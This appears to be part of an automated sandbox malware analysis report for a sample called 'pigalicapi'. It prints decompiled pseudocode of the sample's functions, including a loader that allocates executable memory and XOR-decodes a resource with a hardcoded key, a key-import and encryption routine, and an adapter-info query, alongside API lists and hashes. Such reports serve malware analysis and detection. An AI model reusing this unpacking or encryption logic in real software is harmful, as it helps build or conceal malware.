                                                                                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 024E4A07
                                                                                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 024E4A34
                                                                                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 024E4A7D
                                                                                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 024E4A8A
                                                                                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E4AA5
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2727466597-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3da33cddd8d0b511bf6d92afef016e5b406c0f7ca9b245d438c8c4bf99926ded
                                                                                                                                                                                                                                                                                                        • Instruction ID: 451e083d04b96318a5dd0fc04adeaf4588693ae3073ebf2cc4d26e250cd840f3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3da33cddd8d0b511bf6d92afef016e5b406c0f7ca9b245d438c8c4bf99926ded
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29513F71E40318ABEF25CBA0DC84FEA777CAB48B15F0045D9F609AA181DB759B84CF54
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                                        			E024E8970(intOrPtr _a4, intOrPtr* _a8, BYTE* _a12, int _a16) {
                                                                                                                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                                                                                                                        				long* _v12;
                                                                                                                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                                                                                                                        				long* _v20;
                                                                                                                                                                                                                                                                                                        				char* _t27;
                                                                                                                                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                                                                                                                        				char* _t47;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                                                                                                                                        					_t27 =  *0x24f3370; // 0x24ec6e4
                                                                                                                                                                                                                                                                                                        					_t28 = CryptAcquireContextA( &_v12, _t27, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                                        					if(_t28 == 0) {
                                                                                                                                                                                                                                                                                                        						_v16 = GetLastError();
                                                                                                                                                                                                                                                                                                        						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                                        							_t47 =  *0x24f3370; // 0x24ec6e4
                                                                                                                                                                                                                                                                                                        							CryptAcquireContextA( &_v12, _t47, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                                                                                                                        						if(CryptImportKey(_v12, _a12, _a16, 0, 1,  &_v20) != 0) {
                                                                                                                                                                                                                                                                                                        							_t33 = _v20;
                                                                                                                                                                                                                                                                                                        							__imp__CryptEncrypt(_t33, 0, 1, 0, _a4, _a8,  *_a8);
                                                                                                                                                                                                                                                                                                        							_v8 = _t33;
                                                                                                                                                                                                                                                                                                        							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CryptReleaseContext(_v12, 0); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}











                                                                                                                                                                                                                                                                                                        0x024e8976
                                                                                                                                                                                                                                                                                                        0x024e8981
                                                                                                                                                                                                                                                                                                        0x024e8a60
                                                                                                                                                                                                                                                                                                        0x024e8a66
                                                                                                                                                                                                                                                                                                        0x024e89a5
                                                                                                                                                                                                                                                                                                        0x024e89a5
                                                                                                                                                                                                                                                                                                        0x024e89b5
                                                                                                                                                                                                                                                                                                        0x024e89bf
                                                                                                                                                                                                                                                                                                        0x024e89c7
                                                                                                                                                                                                                                                                                                        0x024e89cf
                                                                                                                                                                                                                                                                                                        0x024e89d9
                                                                                                                                                                                                                                                                                                        0x024e89ed
                                                                                                                                                                                                                                                                                                        0x024e89f8
                                                                                                                                                                                                                                                                                                        0x024e89f8
                                                                                                                                                                                                                                                                                                        0x024e89d9
                                                                                                                                                                                                                                                                                                        0x024e8a02
                                                                                                                                                                                                                                                                                                        0x024e8a04
                                                                                                                                                                                                                                                                                                        0x024e8a27
                                                                                                                                                                                                                                                                                                        0x024e8a3d
                                                                                                                                                                                                                                                                                                        0x024e8a41
                                                                                                                                                                                                                                                                                                        0x024e8a47
                                                                                                                                                                                                                                                                                                        0x024e8a4e
                                                                                                                                                                                                                                                                                                        0x024e8a4e
                                                                                                                                                                                                                                                                                                        0x024e8a5a
                                                                                                                                                                                                                                                                                                        0x024e8a5a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e8a02

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E89BF
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 024E89C9
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E89F8
                                                                                                                                                                                                                                                                                                        • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 024E8A1F
                                                                                                                                                                                                                                                                                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 024E8A41
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 024E8A4E
                                                                                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8A5A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E89B0
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 024E89E8
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
                                                                                                                                                                                                                                                                                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                                        • API String ID: 3736710109-947817771
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8c66ecd4a1ae35ececf10beeaa970dab4811945d35051ec2afa20a57e28f0206
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9d8a74d268e1f6bea4c493ec72515e3926a8844a0a1d874722393d99c1fc8a60
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c66ecd4a1ae35ececf10beeaa970dab4811945d35051ec2afa20a57e28f0206
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25312F71A40309EFEF14CFA4C889BAF77B4BB44705F10895AF502AA280C7B49690CF50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 16%
                                                                                                                                                                                                                                                                                                        			E00401EBB(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                                                                                                                                        				char* _v36;
                                                                                                                                                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                                                                                                                        				char _v56;
                                                                                                                                                                                                                                                                                                        				char _v60;
                                                                                                                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v408;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v412;
                                                                                                                                                                                                                                                                                                        				char _v416;
                                                                                                                                                                                                                                                                                                        				char _v448;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v452;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v456;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v476;
                                                                                                                                                                                                                                                                                                        				char _v480;
                                                                                                                                                                                                                                                                                                        				char* _v496;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v500;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v504;
                                                                                                                                                                                                                                                                                                        				char* _v512;
                                                                                                                                                                                                                                                                                                        				char* _v516;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v520;
                                                                                                                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                                                                                                                        				char* _v528;
                                                                                                                                                                                                                                                                                                        				signed int _v532;
                                                                                                                                                                                                                                                                                                        				char* _v536;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                                                                                                                        				char* _t66;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                                                                                                                                                        				signed int _t95;
                                                                                                                                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t111;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t113;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t114;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t94 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t111 = _t110 - 0x1ec;
                                                                                                                                                                                                                                                                                                        				_v456 = E00418AA0;
                                                                                                                                                                                                                                                                                                        				_v452 = 0x419106;
                                                                                                                                                                                                                                                                                                        				_t60 =  &_v448;
                                                                                                                                                                                                                                                                                                        				 *_t60 =  &_v28;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t60 + 4)) = E00402044;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t60 + 8)) = _t111;
                                                                                                                                                                                                                                                                                                        				 *_t111 =  &_v480;
                                                                                                                                                                                                                                                                                                        				E0040E1A0(__ecx, E00402044);
                                                                                                                                                                                                                                                                                                        				_v52 = 0;
                                                                                                                                                                                                                                                                                                        				_v36 = "s4qYr%myN9I#LzO$Zl35Lk@w#T(T6#^hn^vZ";
                                                                                                                                                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                                                                                                                                                        				_v60 = 0;
                                                                                                                                                                                                                                                                                                        				_v64 = 0;
                                                                                                                                                                                                                                                                                                        				_v416 = L"OMT";
                                                                                                                                                                                                                                                                                                        				_v412 = _a4;
                                                                                                                                                                                                                                                                                                        				_v408 = 0x409;
                                                                                                                                                                                                                                                                                                        				_v496 =  &_v56;
                                                                                                                                                                                                                                                                                                        				_v500 = 3;
                                                                                                                                                                                                                                                                                                        				_t66 =  &_v416;
                                                                                                                                                                                                                                                                                                        				_v504 = _t66;
                                                                                                                                                                                                                                                                                                        				 *_t111 = 0x400000;
                                                                                                                                                                                                                                                                                                        				_v476 = 1;
                                                                                                                                                                                                                                                                                                        				L00404F64();
                                                                                                                                                                                                                                                                                                        				_v48 = _t66;
                                                                                                                                                                                                                                                                                                        				_t67 = _v56;
                                                                                                                                                                                                                                                                                                        				_v512 =  &_v64;
                                                                                                                                                                                                                                                                                                        				_v516 =  &_v60;
                                                                                                                                                                                                                                                                                                        				_v520 = _t67;
                                                                                                                                                                                                                                                                                                        				_v524 = 0x400000;
                                                                                                                                                                                                                                                                                                        				L00404F6C();
                                                                                                                                                                                                                                                                                                        				_t113 = _t111;
                                                                                                                                                                                                                                                                                                        				_v48 = _t67;
                                                                                                                                                                                                                                                                                                        				_v520 = 0x40;
                                                                                                                                                                                                                                                                                                        				_v524 = 0x3000;
                                                                                                                                                                                                                                                                                                        				_v528 =  &_v64;
                                                                                                                                                                                                                                                                                                        				_v532 = 0;
                                                                                                                                                                                                                                                                                                        				_v536 =  &_v52;
                                                                                                                                                                                                                                                                                                        				 *_t113 = 0xffffffff; // executed
                                                                                                                                                                                                                                                                                                        				NtAllocateVirtualMemory(??, ??, ??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                                                                        				_t114 = _t113 - 0x18;
                                                                                                                                                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                                                                                                                                                        				while(_v32 < _v64) {
                                                                                                                                                                                                                                                                                                        					_t95 = _v32;
                                                                                                                                                                                                                                                                                                        					_t105 = ((_t95 * 0xdd67c8a7 >> 0x20) + _t95 >> 5) - (_t95 >> 0x1f);
                                                                                                                                                                                                                                                                                                        					_t94 = _t95 - ((_t105 << 3) + _t105 << 2) + _t105;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_v52 + _v32)) = _v36[_t95 - ((_t105 << 3) + _t105 << 2) + _t105] & 0x000000ff ^  *(_v32 + _v60) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_t107 = _v52;
                                                                                                                                                                                                                                                                                                        				 *_a8 = _v52;
                                                                                                                                                                                                                                                                                                        				 *_t114 =  &_v480;
                                                                                                                                                                                                                                                                                                        				return E0040E320(_t94, _t107);
                                                                                                                                                                                                                                                                                                        			}









































                                                                                                                                                                                                                                                                                                        0x00401ebb
                                                                                                                                                                                                                                                                                                        0x00401ec1
                                                                                                                                                                                                                                                                                                        0x00401ec7
                                                                                                                                                                                                                                                                                                        0x00401ed1
                                                                                                                                                                                                                                                                                                        0x00401edb
                                                                                                                                                                                                                                                                                                        0x00401ee4
                                                                                                                                                                                                                                                                                                        0x00401eeb
                                                                                                                                                                                                                                                                                                        0x00401eee
                                                                                                                                                                                                                                                                                                        0x00401ef7
                                                                                                                                                                                                                                                                                                        0x00401efa
                                                                                                                                                                                                                                                                                                        0x00401eff
                                                                                                                                                                                                                                                                                                        0x00401f06
                                                                                                                                                                                                                                                                                                        0x00401f0d
                                                                                                                                                                                                                                                                                                        0x00401f14
                                                                                                                                                                                                                                                                                                        0x00401f1b
                                                                                                                                                                                                                                                                                                        0x00401f22
                                                                                                                                                                                                                                                                                                        0x00401f2e
                                                                                                                                                                                                                                                                                                        0x00401f37
                                                                                                                                                                                                                                                                                                        0x00401f3d
                                                                                                                                                                                                                                                                                                        0x00401f4a
                                                                                                                                                                                                                                                                                                        0x00401f4e
                                                                                                                                                                                                                                                                                                        0x00401f56
                                                                                                                                                                                                                                                                                                        0x00401f5c
                                                                                                                                                                                                                                                                                                        0x00401f60
                                                                                                                                                                                                                                                                                                        0x00401f67
                                                                                                                                                                                                                                                                                                        0x00401f71
                                                                                                                                                                                                                                                                                                        0x00401f79
                                                                                                                                                                                                                                                                                                        0x00401f7c
                                                                                                                                                                                                                                                                                                        0x00401f82
                                                                                                                                                                                                                                                                                                        0x00401f89
                                                                                                                                                                                                                                                                                                        0x00401f8d
                                                                                                                                                                                                                                                                                                        0x00401f91
                                                                                                                                                                                                                                                                                                        0x00401f98
                                                                                                                                                                                                                                                                                                        0x00401f9d
                                                                                                                                                                                                                                                                                                        0x00401fa0
                                                                                                                                                                                                                                                                                                        0x00401fa3
                                                                                                                                                                                                                                                                                                        0x00401fab
                                                                                                                                                                                                                                                                                                        0x00401fb6
                                                                                                                                                                                                                                                                                                        0x00401fba
                                                                                                                                                                                                                                                                                                        0x00401fc5
                                                                                                                                                                                                                                                                                                        0x00401fc9
                                                                                                                                                                                                                                                                                                        0x00401fd0
                                                                                                                                                                                                                                                                                                        0x00401fd5
                                                                                                                                                                                                                                                                                                        0x00401fd8
                                                                                                                                                                                                                                                                                                        0x00402030
                                                                                                                                                                                                                                                                                                        0x00401ff5
                                                                                                                                                                                                                                                                                                        0x0040200e
                                                                                                                                                                                                                                                                                                        0x0040201c
                                                                                                                                                                                                                                                                                                        0x0040202a
                                                                                                                                                                                                                                                                                                        0x0040202c
                                                                                                                                                                                                                                                                                                        0x0040202c
                                                                                                                                                                                                                                                                                                        0x0040203a
                                                                                                                                                                                                                                                                                                        0x00402040
                                                                                                                                                                                                                                                                                                        0x00402065
                                                                                                                                                                                                                                                                                                        0x00402074

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                                                                                                                                                                                                                                        • String ID: @$OMT$s4qYr%myN9I#LzO$Zl35Lk@w#T(T6#^hn^vZ
                                                                                                                                                                                                                                                                                                        • API String ID: 2485490239-3843035961
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3ba9d8c3c3de79a090e3b742c6c1ed1d57ad730d95a193a03d7c314015c75e69
                                                                                                                                                                                                                                                                                                        • Instruction ID: ff8897463fb2fbedf42f4e80d1da6419d3676337a3971e8b30f16ddae3d354f8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ba9d8c3c3de79a090e3b742c6c1ed1d57ad730d95a193a03d7c314015c75e69
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE4106B09042199FCB00DF69C884BDEFBF4EB89304F10C56AE958A7341D7789A49CF95
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                                                                                                                        			E024E9F70(intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t59;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 1;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                        					_t103 = _a8 - 5;
                                                                                                                                                                                                                                                                                                        					if(_a8 > 5) {
                                                                                                                                                                                                                                                                                                        						asm("cdq");
                                                                                                                                                                                                                                                                                                        						_t59 = E024E97A0( ~(0 | _t103 > 0x00000000) | _a8 / 0x00000006 * 0x00000288);
                                                                                                                                                                                                                                                                                                        						_t100 = _t99 + 4;
                                                                                                                                                                                                                                                                                                        						_v28 = _t59;
                                                                                                                                                                                                                                                                                                        						_v12 = _v28;
                                                                                                                                                                                                                                                                                                        						if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        							_v16 = _v12;
                                                                                                                                                                                                                                                                                                        							_v20 = _a8 * 0x288 / 6;
                                                                                                                                                                                                                                                                                                        							_push( &_v20);
                                                                                                                                                                                                                                                                                                        							_t64 = _v12;
                                                                                                                                                                                                                                                                                                        							_push(_t64); // executed
                                                                                                                                                                                                                                                                                                        							L024EB1DA(); // executed
                                                                                                                                                                                                                                                                                                        							if(_t64 == 0) {
                                                                                                                                                                                                                                                                                                        								_v24 = 0;
                                                                                                                                                                                                                                                                                                        								while(_v12 != 0 && _v24 < _a8) {
                                                                                                                                                                                                                                                                                                        									if( *((intOrPtr*)(_v12 + 0x190)) < _a8 - _v24) {
                                                                                                                                                                                                                                                                                                        										E024E7B70(_a4 + _v24, _v12 + 0x194,  *((intOrPtr*)(_v12 + 0x190)));
                                                                                                                                                                                                                                                                                                        										_t100 = _t100 + 0xc;
                                                                                                                                                                                                                                                                                                        										_v24 = _v24 +  *((intOrPtr*)(_v12 + 0x190));
                                                                                                                                                                                                                                                                                                        										_v12 =  *_v12;
                                                                                                                                                                                                                                                                                                        										_v8 = 1;
                                                                                                                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									break;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								 *_a12 = _v24;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v32 = _v16;
                                                                                                                                                                                                                                                                                                        							E024E97C0(_v32); // executed
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                                                                                                        0x024e9f76
                                                                                                                                                                                                                                                                                                        0x024e9f81
                                                                                                                                                                                                                                                                                                        0x024e9f87
                                                                                                                                                                                                                                                                                                        0x024e9f8b
                                                                                                                                                                                                                                                                                                        0x024e9f94
                                                                                                                                                                                                                                                                                                        0x024e9fad
                                                                                                                                                                                                                                                                                                        0x024e9fb2
                                                                                                                                                                                                                                                                                                        0x024e9fb5
                                                                                                                                                                                                                                                                                                        0x024e9fbb
                                                                                                                                                                                                                                                                                                        0x024e9fc2
                                                                                                                                                                                                                                                                                                        0x024e9fcb
                                                                                                                                                                                                                                                                                                        0x024e9fe0
                                                                                                                                                                                                                                                                                                        0x024e9fe6
                                                                                                                                                                                                                                                                                                        0x024e9fe7
                                                                                                                                                                                                                                                                                                        0x024e9fea
                                                                                                                                                                                                                                                                                                        0x024e9feb
                                                                                                                                                                                                                                                                                                        0x024e9ff2
                                                                                                                                                                                                                                                                                                        0x024e9ff4
                                                                                                                                                                                                                                                                                                        0x024e9ffb
                                                                                                                                                                                                                                                                                                        0x024ea018
                                                                                                                                                                                                                                                                                                        0x024ea034
                                                                                                                                                                                                                                                                                                        0x024ea039
                                                                                                                                                                                                                                                                                                        0x024ea048
                                                                                                                                                                                                                                                                                                        0x024ea050
                                                                                                                                                                                                                                                                                                        0x024ea053
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024ea05e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024ea018
                                                                                                                                                                                                                                                                                                        0x024ea066
                                                                                                                                                                                                                                                                                                        0x024ea066
                                                                                                                                                                                                                                                                                                        0x024ea06b
                                                                                                                                                                                                                                                                                                        0x024ea072
                                                                                                                                                                                                                                                                                                        0x024ea077
                                                                                                                                                                                                                                                                                                        0x024e9fc2
                                                                                                                                                                                                                                                                                                        0x024e9f8b
                                                                                                                                                                                                                                                                                                        0x024ea080

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E97A0: GetProcessHeap.KERNEL32(00000008,024E9FB2,?,024E9FB2,00000000,?,?,?,024E9E2D), ref: 024E97A9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E97A0: HeapAlloc.KERNEL32(00000000,?,024E9FB2,00000000,?,?,?,024E9E2D), ref: 024E97B0
                                                                                                                                                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,024E9E2D), ref: 024E9FEB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Heap$AdaptersAllocInfoProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1618573189-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2f088f3b2aed809a6a384e7926dd01ef5fadce8ecbcfcd7136c408cac7ce4d8a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC310C74D00209DFDF04CF98C495BAEB7B5EF48309F14816AE50AA7350D7359A45CF51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
